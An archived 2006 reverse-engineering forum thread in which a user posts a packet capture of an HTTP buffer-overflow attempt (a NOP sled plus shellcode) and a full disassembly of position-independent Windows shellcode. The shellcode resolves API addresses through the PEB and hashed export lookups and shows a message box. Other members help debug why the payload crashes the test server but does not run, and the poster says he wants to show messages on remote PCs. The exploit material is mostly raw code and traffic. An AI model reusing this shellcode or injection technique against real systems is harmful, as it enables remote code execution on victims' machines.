Exploit [Archive] - RCE Messageboard's Regroupment

View Full Version : Exploit

dcskm4200

August 1st, 2006, 01:24

hello,all
i have a question about remote Exploit.
i wonder is it allowed to talk here?

best regards

dELTA

August 1st, 2006, 02:44

Sure, no problem. Go ahead, and just try to follow the rules in general. And if all else fails, we'll tell you if you do something wrong and spank you a bit.

dcskm4200

August 1st, 2006, 03:42

Hey,dELTA
ok,thanks.
first all, if you are not happy, don't take me into limbo alike SPOOK does.
here is the package on running.

Code:



>>>-------- Index: 0 ---------<<<

48 bytes packet size;

ID: 51976, TTL: 128, Protocol: TCP, Sum: 58845

Src.: 100.100.100.35, Dst.: 100.100.100.106

SPort: 1081, DPort: 59350

Data (easy-to-read): 

?

Data (hex view): 

02 04 05 B4 01 01 04 02 



>>>-------- Index: 1 ---------<<<

40 bytes packet size;

ID: 52232, TTL: 128, Protocol: TCP, Sum: 60637

Src.: 100.100.100.35, Dst.: 100.100.100.106

SPort: 1081, DPort: 59350

Data (easy-to-read): 



Data (hex view): 





>>>-------- Index: 2 ---------<<<

48 bytes packet size;

ID: 29777, TTL: 64, Protocol: TCP, Sum: 15637

Src.: 100.100.100.106, Dst.: 100.100.100.35

SPort: 59350, DPort: 1081

Data (easy-to-read): 

?

Data (hex view): 

02 04 05 B4 01 01 04 02 



>>>-------- Index: 3 ---------<<<

1040 bytes packet size;

ID: 52488, TTL: 128, Protocol: TCP, Sum: 986

Src.: 100.100.100.35, Dst.: 100.100.100.106

SPort: 1081, DPort: 59350

Data (easy-to-read): 

GET /瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞 瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞製2ShU�UUUUｼ�UUUU韋瑞瑞瑞瑞瑞ﾌﾌﾌﾌﾌﾌﾌﾌﾌﾌ美HTTP/1.0逓.............................................................................................. .............

Data (hex view): 

47 45 54 20 2F 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 9



>>>-------- Index: 4 ---------<<<

40 bytes packet size;

ID: 52744, TTL: 128, Protocol: TCP, Sum: 60125

Src.: 100.100.100.35, Dst.: 100.100.100.106

SPort: 1081, DPort: 59350

Data (easy-to-read): 



Data (hex view): 





>>>-------- Index: 5 ---------<<<

40 bytes packet size;

ID: 30033, TTL: 64, Protocol: TCP, Sum: 17429

Src.: 100.100.100.106, Dst.: 100.100.100.35

SPort: 59350, DPort: 1081

Data (easy-to-read): 



Data (hex view): 





>>>-------- Index: 6 ---------<<<

40 bytes packet size;

ID: 53000, TTL: 128, Protocol: TCP, Sum: 59869

Src.: 100.100.100.35, Dst.: 100.100.100.106

SPort: 1081, DPort: 59350

Data (easy-to-read): 



Data (hex view): 





>>>-------- Index: 7 ---------<<<

52 bytes packet size;

ID: 30289, TTL: 64, Protocol: TCP, Sum: 14101

Src.: 100.100.100.106, Dst.: 100.100.100.35

SPort: 59350, DPort: 1081

Data (easy-to-read): 

RFB 003.008



Data (hex view): 

52 46 42 20 30 30 33 2E 30 30 38 0A 



8 packets sniffed (bytes: 1348)...

the iP address has been edited by me.
the code can't work on my pc.

dELTA

August 1st, 2006, 05:41

You must post more info about what this really is, and what is your exact question?

dcskm4200

August 1st, 2006, 07:30

hey,dELTA
actually, i know nothing.
it is about remote Exploit.
i think the code can't work.
prepare+shellcode+exitCondition+crap=

Code:

00401000   . BB 32536855                                        MOV EBX,55685332

00401005   . 81EB 55555555                                      SUB EBX,55555555

0040100B   . BC F54F81EC                                        MOV ESP,EC814FF5

00401010   . 55                                                 PUSH EBP

00401011   . 55                                                 PUSH EBP

00401012   . 55                                                 PUSH EBP

00401013   . 55                                                 PUSH EBP

00401014   . E8 00000000                                        CALL test_2.00401019

00401019  /$ 5F                                                 POP EDI

0040101A  |. 81EF 1E104000                                      SUB EDI,test_2.0040101E

00401020  |. 8D87 94104000                                      LEA EAX,DWORD PTR DS:[EDI+401094]

00401026  |. 50                                                 PUSH EAX

00401027  |. E8 83000000                                        CALL test_2.004010AF

0040102C  |. 8D87 A5104000                                      LEA EAX,DWORD PTR DS:[EDI+4010A5]

00401032  |. 50                                                 PUSH EAX

00401033  |. E8 77000000                                        CALL test_2.004010AF

00401038  |. 2BC0                                               SUB EAX,EAX

0040103A  |. 50                                                 PUSH EAX

0040103B  |. 8D9F 83104000                                      LEA EBX,DWORD PTR DS:[EDI+401083]

00401041  |. 53                                                 PUSH EBX

00401042  |. 8D9F 5E104000                                      LEA EBX,DWORD PTR DS:[EDI+40105E]

00401048  |. 53                                                 PUSH EBX

00401049  |. 50                                                 PUSH EAX

0040104A  |. FF97 AC104000                                      CALL DWORD PTR DS:[EDI+4010AC]

00401050  |. 6A 00                                              PUSH 0

00401052  |. FF97 9D104000                                      CALL DWORD PTR DS:[EDI+40109D]

00401058  \. C3                                                 RETN

00401059   . 5B 2A 5D 20 48 65 6C 6C 6F 20 57 6F 72 6C 64 20    ASCII "  Hello World "

00401069   . 43 6F 64 65 72 21 20 28 43 29 20 41 6E 73 6B 79    ASCII "Coder! (C) Ansky"

00401079   . 61 2E 0D 0A 00                                     ASCII "a.

",0

0040107E   . 4D 73 67 42 6F 78 20 42 79 20 41 6E 73 6B 79 61    ASCII "MsgBox By Anskya"

0040108E   . 00                                                 ASCII 0

0040108F   . 6B 65 72 6E 65 6C 33 32 00                         ASCII "kernel32",0

00401098     01                                                 DB 01

00401099     92                                                 DB 92

0040109A     8F                                                 DB 8F

0040109B     05                                                 DB 05

0040109C     00                                                 DB 00

0040109D   . 00000075                                           DD 75000000

004010A1   . 73 65 72 33 32 00                                  ASCII "ser32",0

004010A7     F7                                                 DB F7

004010A8     6C                                                 DB 6C                                                                   ;  CHAR 'l'

004010A9     55                                                 DB 55                                                                   ;  CHAR 'U'

004010AA     D8                                                 DB D8

004010AB     00                                                 DB 00

004010AC     00                                                 DB 00

004010AD     00                                                 DB 00

004010AE     00                                                 DB 00

004010AF  /$ 60                                                 PUSHAD

004010B0  |. 8B7424 24                                          MOV ESI,DWORD PTR SS:[ESP+24]

004010B4  |. E8 97000000                                        CALL test_2.00401150

004010B9  |. 68 ADD13441                                        PUSH 4134D1AD

004010BE  |. 50                                                 PUSH EAX

004010BF  |. E8 1F000000                                        CALL test_2.004010E3

004010C4  |. 56                                                 PUSH ESI

004010C5  |. FFD0                                               CALL EAX

004010C7  |. 8BD8                                               MOV EBX,EAX

004010C9  |. 2BC0                                               SUB EAX,EAX

004010CB  |> AC                                                 /LODS BYTE PTR DS:[ESI]

004010CC  |. 84C0                                               |TEST AL,AL

004010CE  |.^75 FB                                              \JNZ SHORT test_2.004010CB

004010D0  |. 8BFE                                               MOV EDI,ESI

004010D2  |> AD                                                 /LODS DWORD PTR DS:[ESI]

004010D3  |. 85C0                                               |TEST EAX,EAX

004010D5  |. 74 0A                                              |JE SHORT test_2.004010E1

004010D7  |. 50                                                 |PUSH EAX

004010D8  |. 53                                                 |PUSH EBX

004010D9  |. E8 05000000                                        |CALL test_2.004010E3

004010DE  |. AB                                                 |STOS DWORD PTR ES:[EDI]

004010DF  |.^EB F1                                              \JMP SHORT test_2.004010D2

004010E1  |> 61                                                 POPAD

004010E2  \. C3                                                 RETN

004010E3  /$ 60                                                 PUSHAD

004010E4  |. 8B5C24 24                                          MOV EBX,DWORD PTR SS:[ESP+24]

004010E8  |. 8B7424 28                                          MOV ESI,DWORD PTR SS:[ESP+28]

004010EC  |. 2BED                                               SUB EBP,EBP

004010EE  |. 8BD3                                               MOV EDX,EBX

004010F0  |. 0352 3C                                            ADD EDX,DWORD PTR DS:[EDX+3C]

004010F3  |. 8B52 78                                            MOV EDX,DWORD PTR DS:[EDX+78]

004010F6  |. 03D3                                               ADD EDX,EBX

004010F8  |. 8B42 18                                            MOV EAX,DWORD PTR DS:[EDX+18]

004010FB  |. 8B7A 1C                                            MOV EDI,DWORD PTR DS:[EDX+1C]

004010FE  |. 03FB                                               ADD EDI,EBX

00401100  |. 8B7A 20                                            MOV EDI,DWORD PTR DS:[EDX+20]

00401103  |. 03FB                                               ADD EDI,EBX

00401105  |. 52                                                 PUSH EDX

00401106  |. 8BD7                                               MOV EDX,EDI

00401108  |> 8B17                                               /MOV EDX,DWORD PTR DS:[EDI]

0040110A  |. 03D3                                               |ADD EDX,EBX

0040110C  |. 45                                                 |INC EBP

0040110D  |. 60                                                 |PUSHAD

0040110E  |. 8BF2                                               |MOV ESI,EDX

00401110  |. 2BC9                                               |SUB ECX,ECX

00401112  |> AC                                                 |/LODS BYTE PTR DS:[ESI]

00401113  |. 41                                                 ||INC ECX

00401114  |. 84C0                                               ||TEST AL,AL

00401116  |.^75 FA                                              |\JNZ SHORT test_2.00401112

00401118  |. 894C24 18                                          |MOV DWORD PTR SS:[ESP+18],ECX

0040111C  |. 61                                                 |POPAD

0040111D  |. 60                                                 |PUSHAD

0040111E  |. 2BC0                                               |SUB EAX,EAX

00401120  |. E8 51000000                                        |CALL test_2.00401176

00401125  |. 3BC6                                               |CMP EAX,ESI

00401127  |. 61                                                 |POPAD

00401128  |. 74 08                                              |JE SHORT test_2.00401132

0040112A  |. 83C7 04                                            |ADD EDI,4

0040112D  |. 48                                                 |DEC EAX

0040112E  |. 74 18                                              |JE SHORT test_2.00401148

00401130  |.^EB D6                                              \JMP SHORT test_2.00401108

00401132  |> 5A                                                 POP EDX

00401133  |. 4D                                                 DEC EBP

00401134  |. 8B4A 24                                            MOV ECX,DWORD PTR DS:[EDX+24]

00401137  |. 03CB                                               ADD ECX,EBX

00401139  |. 0FB70469                                           MOVZX EAX,WORD PTR DS:[ECX+EBP*2]

0040113D  |. 8B6A 1C                                            MOV EBP,DWORD PTR DS:[EDX+1C]

00401140  |. 03EB                                               ADD EBP,EBX

00401142  |. 8B4485 00                                          MOV EAX,DWORD PTR SS:[EBP+EAX*4]

00401146  |. 03C3                                               ADD EAX,EBX

00401148  |> 894424 1C                                          MOV DWORD PTR SS:[ESP+1C],EAX

0040114C  |. 61                                                 POPAD

0040114D  \. C2 0800                                            RETN 8

00401150  /$ 60                                                 PUSHAD

00401151  |. 2BC0                                               SUB EAX,EAX

00401153  |. 64:8B40 30                                         MOV EAX,DWORD PTR FS:[EAX+30]

00401157  |. 85C0                                               TEST EAX,EAX

00401159  |. 78 0C                                              JS SHORT test_2.00401167

0040115B  |. 8B40 0C                                            MOV EAX,DWORD PTR DS:[EAX+C]

0040115E  |. 8B70 1C                                            MOV ESI,DWORD PTR DS:[EAX+1C]

00401161  |. AD                                                 LODS DWORD PTR DS:[ESI]

00401162  |. 8B40 08                                            MOV EAX,DWORD PTR DS:[EAX+8]

00401165  |. EB 09                                              JMP SHORT test_2.00401170

00401167  |> 8B40 34                                            MOV EAX,DWORD PTR DS:[EAX+34]

0040116A  |. 8D40 7C                                            LEA EAX,DWORD PTR DS:[EAX+7C]

0040116D  |. 8B40 3C                                            MOV EAX,DWORD PTR DS:[EAX+3C]

00401170  |> 894424 1C                                          MOV DWORD PTR SS:[ESP+1C],EAX

00401174  |. 61                                                 POPAD

00401175  \. C3                                                 RETN

00401176  /$ 60                                                 PUSHAD

00401177  |. E3 18                                              JECXZ SHORT test_2.00401191

00401179  |. F7D0                                               NOT EAX

0040117B  |> 3202                                               /XOR AL,BYTE PTR DS:[EDX]

0040117D  |. 42                                                 |INC EDX

0040117E  |. B3 08                                              |MOV BL,8

00401180  |> D1E8                                               |/SHR EAX,1

00401182  |. 73 05                                              ||JNB SHORT test_2.00401189

00401184  |. 35 2083B8ED                                        ||XOR EAX,EDB88320

00401189  |> FECB                                               ||DEC BL

0040118B  |.^75 F3                                              |\JNZ SHORT test_2.00401180

0040118D  |.^E2 EC                                              \LOOPD SHORT test_2.0040117B

0040118F  |. F7D0                                               NOT EAX

00401191  |> 894424 1C                                          MOV DWORD PTR SS:[ESP+1C],EAX

00401195  |. 61                                                 POPAD

00401196  \. C3                                                 RETN

dcskm4200

August 1st, 2006, 08:15

made a simple httpserver.
in test_1.exe, set port =80 ,szRemote= the simple httpserver ip addr.
the test_1.exe can close the simple httpserver, but can't display msgbox.

best regards

dELTA

August 1st, 2006, 17:21

Ok, you say you "know nothing", but hopefully you do at least know exactly what you want to ask, or accomplish, by posting this thread? I still don't see any question in there, so exactly what is it that you want us to reply or do?

naides

August 1st, 2006, 18:11

A true reverser will have to decipher these postings, read this guy's mind and figure out what the fuck he is up to. . .

Where's evaluator?

sHice

August 1st, 2006, 18:57

he wants to know why the shellcode can shut down the http server but why it doesnt display a messagebox like it's supposed to.i tried executing the shellcode starting at 00401014 and it works like it is supposed to here.it displays a messagebox and exits the thread with ExitThread afterwards.i could not test it with a http server because i'm not into this kind of stuff but the shellcode worked when executing it in a masm compiled app.if you have set up a server on your own machine you could simply debug it and watch whats happening when the shellcode is received.

JMI

August 1st, 2006, 19:14

I agree that it is time for dcskm4200 to get his act together and figure out how to actually ask a question, instead of posting code and confusing and/or incomplete statements.

Regards,

dcskm4200

August 2nd, 2006, 02:07

Thanks all who answered the question.

don't worry, if i want to do something, i'v already done. because the google university not only provide homework, but also provide the useable DDOS.

all is in source code.
i think finding the question is diffculter than figuring out the question. if i knew where is the error, maybe i have figured out.
i want to display a msg "Hey,baby. i'm coming!" on remote pc.

@sHice:
you have read the code. you gave me an valuable method.

i have't any experience on remote debug.

best regards

dELTA

August 2nd, 2006, 03:34

Ok, brushing off old mind-reading powers...

My guess is that you're under the impression that a remote exploit works on any program or server type/version that you send it to? But you see, an exploit like this only works on a very specific server brand, and version, having a special vulnerability that the exploit uses to get the code to execute. The hard part is always to get the other computer to execute your code in the first place, the rest is piece of cake.

So, even if this code is perfectly working, the injection vector might not be. See what I mean?

dcskm4200

August 2nd, 2006, 09:17

Hey,dELTA
Thanks your response.

you are absolutely right.

but OS vulnerability is universal to use remote exploit. most of users don't know how to use. for example, update OS from remote(of course,This isn't exploit, is backdoor.).

best regards

laola

August 4th, 2006, 03:21

Universal, huh? The go right ahead and exploit my C64

dcskm4200

August 4th, 2006, 06:55

it seems strong you are now.

deroko

August 6th, 2006, 16:56

Quote:

[Originally Posted by dcskm4200]
i have't any experience on remote debug.

well install that http server on your machine, and store int 3h at the beggining of shellcode, if you have right ret value overwriten or u have used attack with stack overflow using right address, softice(bpint 3 or i3here on) should popup when int 3h in shellcode occurs and you may debug your shellcode w/o a problem and figure where it fails.